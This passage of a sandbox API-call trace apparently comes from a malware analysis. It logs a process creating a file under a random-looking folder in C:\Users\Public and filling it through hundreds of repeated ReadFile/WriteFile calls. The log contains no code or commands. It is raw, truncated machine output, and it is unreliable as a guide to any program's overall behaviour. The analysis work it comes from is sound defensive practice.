lpFileInformation=0x4bf380) returned 1 [0019.977] wcslen (_String="C:\\Users\\Public\\N3Eg\\ljkg4") returned 0x1a [0019.977] wcscpy (in: _Dest=0x15010cc0, _Source="C:\\Users\\Public\\N3Eg\\ljkg4" | out: _Dest="C:\\Users\\Public\\N3Eg\\ljkg4") returned="C:\\Users\\Public\\N3Eg\\ljkg4" [0019.977] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\ljkg4" (normalized: "c:\\users\\public\\n3eg\\ljkg4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b4 [0019.978] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0019.979] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0019.981] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x8e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0019.981] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0019.982] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3a2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0019.982] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0019.983] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x326, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0019.983] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.001] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x372, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.002] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.002] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f9, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.003] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.003] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x33e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.004] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.004] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x391, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.005] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.005] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x32c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.006] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.006] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.007] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.007] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.008] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.008] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.009] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.009] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2da, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.010] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.010] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2e2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.011] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.011] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2eb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.012] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.012] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2eb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.013] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.013] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.014] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.014] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2e2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.015] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.015] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x35b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.016] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.016] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2e5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.017] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.017] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2af, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.018] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.018] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x39e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.019] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.019] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x30b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.020] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.020] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x363, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.021] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.021] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x342, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.022] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.022] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.023] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x197, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.023] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.024] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.024] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.025] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.025] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.026] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.026] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x11d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.027] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.027] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.028] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.028] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x328, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.029] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.029] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.030] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.030] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.031] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.031] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.032] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.032] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x29b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.033] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.033] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.034] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.034] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ea, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.035] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.035] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f4, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.036] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.036] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x357, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.037] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.037] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x33e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.038] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.038] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3db, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.040] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.040] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.041] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.041] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2bc, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.042] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.042] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.043] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.043] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x34a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.044] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.044] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x364, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.045] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.045] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x38d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.046] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.046] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ef, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.047] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: 